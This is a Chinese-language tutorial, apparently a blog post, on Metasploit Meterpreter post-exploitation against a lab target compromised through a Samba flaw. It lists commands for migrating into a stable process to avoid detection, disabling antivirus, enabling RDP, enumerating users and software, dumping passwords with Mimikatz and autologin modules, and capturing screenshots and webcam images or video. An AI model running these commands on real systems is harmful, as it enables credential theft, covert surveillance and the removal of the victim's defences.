本篇主要讲利用MSF获取靶机shell后可进行的操作及利用方式
前提:已经通过Samba服务漏洞获取了Meterpreter shell,利用方式可参考https://www.jianshu.com/p/839ac7af5e4c
后渗透攻击:信息搜集
进程迁移
刚获取的Meterpreter shell非常脆弱易受攻击,例如攻击者可以利用浏览器漏洞攻陷目标机器,攻击渗透后浏览器有可能被用户关闭。所以第一步就是要移动进程,将它和目标机中一个稳定的进程绑在一起,而不需要对磁盘进行任何写入操作。(渗透更难被检测)
-
使用
ps命令获取靶机正在运行的进程
1.png
-
使用
getpid命令查看Meterpreter Shell 的进程号
2.png
-
使用
migrate PID命令迁移进程,进程迁移后会自动关闭原来进程,没有关闭可使用 kill pid 命令关闭进程。或者使用自动迁移进程(run post/windows/manage/migrate)命令,系统会自动寻找合适的进程然后迁移
3.png
系统命令
获得稳定进程后,收集系统信息
-
使用
sysinfo命令查看目标机的系统信息
4.png
-
输入
run post/windows/gather/checkvm命令查看靶机是否允许在虚拟机上
5.png
-
检查靶机是否正在运行,使用
idletime查看靶机最近运行的时间
6.png
-
使用
route命令查看靶机完整的网络设置
7.png
-
background 命令可将当前会话放置后台,适合在多个Meterpreter 会话的场景下使用。使用 getuid 命令查看当前靶机已经渗透成功的用户名
8.png
-
使用
run post/windows/manage/killav命令关闭靶机系统杀毒软件
9.png
-
使用
run post/windows/manage/enable_rdp命令启动靶机远程桌面协议
10.png
-
使用
background命令将当前Meterpreter终端隐藏在后台 -
sessions -i重新调用终端
11.png
-
使用
run post/windows/gather/enum_logged_on_users列举当前登录靶机用户
12.png
-
使用
run post/windows/gather/enum_applications列举安装在靶机上的应用程序
13.png
-
很多用户习惯将计算机设置自动登录,可以使用
run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码
14.png
- Mimikatz 抓取密码
使用load mimikatz命令加载模块,msv抓取
15.png
解密一下成功获取密码
16.png
- 没有抓取到,此时可利用扩展插件Espia 抓取靶机屏幕截图。使用
load espia命令加载插件,screengrab或者screenshot命令抓取截图
16.png
一些其他可利用的命令
webcam_list
查看靶机是否有摄像头
webcam_snap
打开靶机摄像头拍一张照片
webcam_stream
开启直播模式,抓取视频












网友评论